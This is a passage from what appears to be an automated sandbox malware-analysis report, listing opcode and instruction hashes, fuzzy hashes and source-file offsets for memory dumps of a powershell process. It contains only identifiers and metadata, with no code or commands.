                                                                                                                                                                        • Instruction ID: c7eee7f4c89c54100f9204bbf7e44d13c1db0b82b9ee9d347fc5feaa7639ca63
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c172226acae7442b3bee0eca36e5d985fb581553b82d925dc371b1bd3ecf3e1
                                                                                                                                                                        • Instruction Fuzzy Hash: B0611771E002489FCB14DFA9D598A9DFBF6EF88314F188169E809AB354EB349941CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 08deba3d375d7986370fbc0e8f639b91a01c644a31f78948b685a89942d298c4
                                                                                                                                                                        • Instruction ID: b4b214a928acff78c9493c6e7a11d721a984f60986695d0d0bffab979a9c5408
                                                                                                                                                                        • Opcode Fuzzy Hash: 08deba3d375d7986370fbc0e8f639b91a01c644a31f78948b685a89942d298c4
                                                                                                                                                                        • Instruction Fuzzy Hash: C951B0753002059FD714DBA9D888A7AB7EAFFC9219F1488A9D509CB351EB35EC01CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5c2122fef956538b8d3b5d735dcdc9f6ec1cd6ab245911a75e3177069bba25f2
                                                                                                                                                                        • Instruction ID: fe80c444ffeac161ad143103b7c8eaf46ec18c2db15c47a1c6a25724c2f6bb6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c2122fef956538b8d3b5d735dcdc9f6ec1cd6ab245911a75e3177069bba25f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B5139B5E002489FCB14CFA9D598B9DFBF6EF88314F188069E809EB354EB349945CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 159e0d7dfcc6594e0628643570960cb8b6bd17948a876ae03c17c1962b774d8c
                                                                                                                                                                        • Instruction ID: 93dfda182af6ca7c9c0f97f1e4cf68179a5ab078d51398fc5734fae52879014c
                                                                                                                                                                        • Opcode Fuzzy Hash: 159e0d7dfcc6594e0628643570960cb8b6bd17948a876ae03c17c1962b774d8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 944174B87102058FDB10DF6DC598E2EBBEAEF8831475484A9E489CF355EB31EC058B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0581968d7b2ed9c6c81ddedc5aba6f4706110b1021a0218c8ca4838c18aca209
                                                                                                                                                                        • Instruction ID: d282679ae293dc500512ccd590f502200d18016c096f34d1be8c509d08d98602
                                                                                                                                                                        • Opcode Fuzzy Hash: 0581968d7b2ed9c6c81ddedc5aba6f4706110b1021a0218c8ca4838c18aca209
                                                                                                                                                                        • Instruction Fuzzy Hash: A851ECB4704B09CFC358DA2C8149536B7E3BB956407D68D69E0A7CBB01EA38FC46CB52
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaef79259a4c05e0ea8970132b7f1a8d427fe9ba91ddb3ca0d6242cd9739fe6
                                                                                                                                                                        • Instruction Fuzzy Hash: F5210779504200DFCB05CF14E9C8B26BB65FB98314F24C599DA0A4AE56C336D456CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9324836952976c0ab2064bb72cf79dbf46b044931b328b579b3444a2d746a241
                                                                                                                                                                        • Instruction ID: 0c441a558b7174a676fe9c39cfbd231ee1718e390a19d04c2f8c57bf21bed304
                                                                                                                                                                        • Opcode Fuzzy Hash: 9324836952976c0ab2064bb72cf79dbf46b044931b328b579b3444a2d746a241
                                                                                                                                                                        • Instruction Fuzzy Hash: B421F3B5A04226CFDB29DF59C541B7D77E1BB15311F078066E8048B290C734D962EBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d2feb8d8bd318d1679e4b713cf715456b156ddcbcd34495047fda9709fa136a1
                                                                                                                                                                        • Instruction ID: e5f0f233c0991af318f669439cb9ef09994d91c83f6f7179ccee4c72375b9770
                                                                                                                                                                        • Opcode Fuzzy Hash: d2feb8d8bd318d1679e4b713cf715456b156ddcbcd34495047fda9709fa136a1
                                                                                                                                                                        • Instruction Fuzzy Hash: AF21067D504204DFDB11DF14E9C8B25BBA5EB64314F24C569DA0B8B646C736D406CB62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6e482e8299fd0e9997b25f420e2f6cfb94016a43198803295cc1386e0bda0c6b
                                                                                                                                                                        • Instruction ID: 613d4215baf3d62fd75fa231f9c3b3036dd8df2c42d5ffd7fdfd4fbb7630f8a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e482e8299fd0e9997b25f420e2f6cfb94016a43198803295cc1386e0bda0c6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 492197B49017448EEB60CF6AC4887AAFBF6EB88324F28C45ED81D97305DB746481CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f7245f65c6dba3eb32d00892fce9b82c53dfd184540fd2e3247c75ea0ebf051d
                                                                                                                                                                        • Instruction ID: 94de08472ab43b32d1bd57a7813fc8cc76824b262eb6ac52e7b4cda34ba4fc70
                                                                                                                                                                        • Opcode Fuzzy Hash: f7245f65c6dba3eb32d00892fce9b82c53dfd184540fd2e3247c75ea0ebf051d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D112B797001188FCB04DBACE944AEEB7F6EBCC656B0440A5E909DB310DB35DC018BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cd99a3fbba6027b103572da4030cbc123c4038ebb1dc58c35c2b8c8b0a1b91bf
                                                                                                                                                                        • Instruction ID: 82515e67dc4b8eaa1adce729e720c244eb44444004cb7b17c1c9a32e0342833b
                                                                                                                                                                        • Opcode Fuzzy Hash: cd99a3fbba6027b103572da4030cbc123c4038ebb1dc58c35c2b8c8b0a1b91bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 79110276B045549FCB02DAB8E8198FDBBF1DB88231B0484BAE815DB351CB215C46CBF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2d298b9918fe32bf387dcd9f40480e23892aef65e9d06e7ca9b0019d4b364ae3
                                                                                                                                                                        • Instruction ID: b1d099ae6bba51181850052a38a10b60a68ef7b84ae7f324a0ba0ffeccd01cbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d298b9918fe32bf387dcd9f40480e23892aef65e9d06e7ca9b0019d4b364ae3
                                                                                                                                                                        • Instruction Fuzzy Hash: 80219D758053898FDB10CFAAC908BEABFF8EF49224F18849AD448A7641D7399544CFA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c8f6d65a1c71f71380573bfcba01473239f62d408e26170bc1fa7d953fe4f6af
                                                                                                                                                                        • Instruction ID: 6b9a077a7815ab683a873bdf5dd55633a397e48133e1673c86540cf558f7a352
                                                                                                                                                                        • Opcode Fuzzy Hash: c8f6d65a1c71f71380573bfcba01473239f62d408e26170bc1fa7d953fe4f6af
                                                                                                                                                                        • Instruction Fuzzy Hash: 141104B0A00236CFCF25CF59C540B6FB7E5FF45221F168069D50887291C730D966DBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction ID: b68bd43674bc5ab64384311fd1f69f352f584f7910944cc32a43f84114df17c8
                                                                                                                                                                        • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction Fuzzy Hash: C2219D7A504240DFCF06CF14D9C8B26BF72FB98314F24C5A9D94A4AA56C33AD46ACB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 24f3d712d7d947492d0d6f735a845afc7b0ac15b2ec51d2030a12ae71ec9bf08
                                                                                                                                                                        • Instruction ID: 60ced0753ad047ba18db673636ccde5291b676cd241ec699153814df73cc76a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 24f3d712d7d947492d0d6f735a845afc7b0ac15b2ec51d2030a12ae71ec9bf08
                                                                                                                                                                        • Instruction Fuzzy Hash: DF11FCB4A002199FCB04DF98C494AAAFBF5FF49310B1585A9D919AB351C731EC45CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction ID: e58b2932af5beefdffc64aad9c229c88494f44543f0ca8a047b1f806e25d8abd
                                                                                                                                                                        • Opcode Fuzzy Hash: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3811BE79504280CFCB11CF14E5C8B25BF61FB54224F24C6A9D90A8BA56C33AD44ACB52
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 43624172d2b4f3d89afffdf0aaf9ddc2a568561409c5a11517ba5ea69a6a16aa
                                                                                                                                                                        • Instruction ID: 27237748675a19e7c7732f4af112104c6c4db046e55bea6d15910dd9994a151c
                                                                                                                                                                        • Opcode Fuzzy Hash: 43624172d2b4f3d89afffdf0aaf9ddc2a568561409c5a11517ba5ea69a6a16aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11E6B8A002199FCB04DF98D494AAEFBF5FF88310B158599E919AB351C731ED41CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e6a30524b919fda7bb8dba827a9cdc98524ad11395e842a0d1405b57720a56cb
                                                                                                                                                                        • Instruction ID: 35d0ebf890b599bd5a3f06e6e3d8efd26976de7fa2ce3defec6758bb39aea941
                                                                                                                                                                        • Opcode Fuzzy Hash: e6a30524b919fda7bb8dba827a9cdc98524ad11395e842a0d1405b57720a56cb
                                                                                                                                                                        • Instruction Fuzzy Hash: E211BCB5900349CFDB10CFAAC508BAABBF8EB48324F2484ADD44CA7640D339A540CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f0a2006ad105bf00059b779a46958f2b3b790e8ebae7cbbb23337263804b0401
                                                                                                                                                                        • Instruction ID: fa545a04ca79d100183177d3e1e8c0a8c4870f63150f99dbfc16d13baf93349c
                                                                                                                                                                        • Opcode Fuzzy Hash: f0a2006ad105bf00059b779a46958f2b3b790e8ebae7cbbb23337263804b0401
                                                                                                                                                                        • Instruction Fuzzy Hash: E901C0316083449FD714CB79D4A8A6A7FF5EF45210F1488EED04ACB6A2DB34E845CB01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b222e50f9346f85926cb6f123248e7fa16eec4f0a485c07c3478a71a0065e61d
                                                                                                                                                                        • Instruction ID: 526a221087f0fdee10847ed7e155793e1cdfc5515e42c4dfcb2b3db2ceded9c6
                                                                                                                                                                        • Opcode Fuzzy Hash: b222e50f9346f85926cb6f123248e7fa16eec4f0a485c07c3478a71a0065e61d
                                                                                                                                                                        • Instruction Fuzzy Hash: EA019E35B002149FCB119F74E848AAEBBF6FB88325F104069E91AD3341DB369901CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4b9694e169870fa959589ea40b83a166fde600a27eb56b9ddd24f6f7f339d01d
                                                                                                                                                                        • Instruction ID: ae5c01e2e358d31c773d7c4c1d79f024da446ee274f42dafe07babbc6ec989bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9694e169870fa959589ea40b83a166fde600a27eb56b9ddd24f6f7f339d01d
                                                                                                                                                                        • Instruction Fuzzy Hash: 13110C34204750CFC724DF75D040956B7F6EF8521572089ADD48A87B90CB32F845CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 531ce6b318c81415f5b3ae8f436dc9eb783b7c86751b129b0c20b4621d897d4e
                                                                                                                                                                        • Instruction ID: 81fa42b54a4ee534a2a6ce1f464794f475f32d54cb8df54bb8e49b9012d95b41
                                                                                                                                                                        • Opcode Fuzzy Hash: 531ce6b318c81415f5b3ae8f436dc9eb783b7c86751b129b0c20b4621d897d4e
                                                                                                                                                                        • Instruction Fuzzy Hash: DE11E634A05248DFDB15CBA8D488AADFBF2AF48304F24C559E404AB365C771AD82CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e929b2dd832b2242ce9e24d71e1576c1a64570ccf5c84741331dd9263ebe6ae7
                                                                                                                                                                        • Instruction ID: 67ec69335cfda9a24c9a68e1cbdc5004e4f1e06e00d505cc52bcb9c2bd1b67c8
                                                                                                                                                                        • Opcode Fuzzy Hash: e929b2dd832b2242ce9e24d71e1576c1a64570ccf5c84741331dd9263ebe6ae7
                                                                                                                                                                        • Instruction Fuzzy Hash: 6101F7792043449AE7208A25CCC8B76BFD8DF51329F18C41AED0C8F242C7789845C6B2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 211a9e6a31cc3c74f699b1ae2117604c831801bcc17434a2fcf4bd65eed5ae52
                                                                                                                                                                        • Instruction ID: 5477bbf0f752eab7164b098338ec27087265675212766ec84e99f4359d940203
                                                                                                                                                                        • Opcode Fuzzy Hash: 211a9e6a31cc3c74f699b1ae2117604c831801bcc17434a2fcf4bd65eed5ae52
                                                                                                                                                                        • Instruction Fuzzy Hash: 5801526510E3C05ED7124B258C98B62BFB4DF53224F1DC1CBD9888F1A3C2695849C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 67321d74c865bcb7fdde869fa57f9e69b3082c81049365552e3d35d57987db22
                                                                                                                                                                        • Instruction ID: c4841cc6326b88d3141080837745e2a58e56b616ff010d611fe166eae61113a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 67321d74c865bcb7fdde869fa57f9e69b3082c81049365552e3d35d57987db22
                                                                                                                                                                        • Instruction Fuzzy Hash: 53F022723083A11FD3008AA99C50DBB7FE9EF86221B0444BBF880C7362DA71CD0087A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1c299c1271a11e16803fa445ebfa0455c0a93b5a259c8b8f5c58f7c097a346cc
                                                                                                                                                                        • Instruction ID: 63394af0450c5882e73749c878807bfd6dc1f508f63bfbf4b7c779206c261802
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c299c1271a11e16803fa445ebfa0455c0a93b5a259c8b8f5c58f7c097a346cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 0AF0E9717457145B8712569EA8188FE7BE9DFC667230004B7E429C7200DB21990587F2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a1905a2b95d1404af3672ed61ab79b0169f8bdff5e81f72df67dd57cc574a4a
                                                                                                                                                                        • Instruction ID: fa5a95fd8c183670811fd6b2a6231edb51fedc800ecde43da4fbfbc1e6c33f62
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a1905a2b95d1404af3672ed61ab79b0169f8bdff5e81f72df67dd57cc574a4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DF027B55446055FD7115F78D0187AFBBA6EFC1728F10416AC80597381DE372905CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d137c2db674da10be321555670fd5855135baf992b1fa0b724ca1d8e1291aa78
                                                                                                                                                                        • Instruction ID: 57c68f0110e502bf6bd21460f2716b1a6f0b71eaa8bafcef761f2208d4a2fb0f
                                                                                                                                                                        • Opcode Fuzzy Hash: d137c2db674da10be321555670fd5855135baf992b1fa0b724ca1d8e1291aa78
                                                                                                                                                                        • Instruction Fuzzy Hash: E2F0B4767052545FC71096A9DC88BBFBBEAEF88662B00052DE44AD3390DF349C468BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 01e88e035dacd08edab6c23a92a5c3ff5f6fb092220413f722ca48f6e532c3d0
                                                                                                                                                                        • Instruction ID: 51b3076008ddd1f3500b48ebcd4fa7bb3419497c89f28860a3362d84f578bdd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 01e88e035dacd08edab6c23a92a5c3ff5f6fb092220413f722ca48f6e532c3d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF0F97A200644AF97248F0ADD85C23FBEDEFD4674719C59AE84A8B712C671EC41CAA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: df9cadc19c9004c219efc99cb4259d7cfd168ebd22609938cfdab9102f27c3cd
                                                                                                                                                                        • Instruction ID: c636a48e3c16739cb258697c2da1530549db3752b2c8055a83a934bea1def902
                                                                                                                                                                        • Opcode Fuzzy Hash: df9cadc19c9004c219efc99cb4259d7cfd168ebd22609938cfdab9102f27c3cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 71F054769463004FD7609BB9D499396BFE5EB01320F00446AD14DC7341DB39698587A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2f52af360d4f2f485ca5a7bdfb97d51f3727c428b996c26b0e7d63226a82ce5e
                                                                                                                                                                        • Instruction ID: 2aaeadcc04a0254ca1324b2d5baf5e633dae35507bcca4c9dffbe47b4a204d9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f52af360d4f2f485ca5a7bdfb97d51f3727c428b996c26b0e7d63226a82ce5e
                                                                                                                                                                        • Instruction Fuzzy Hash: 39E061F2B433141B9B5025B5451837AF6DFDFD62947440036CE01C7341DD36CC054791
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
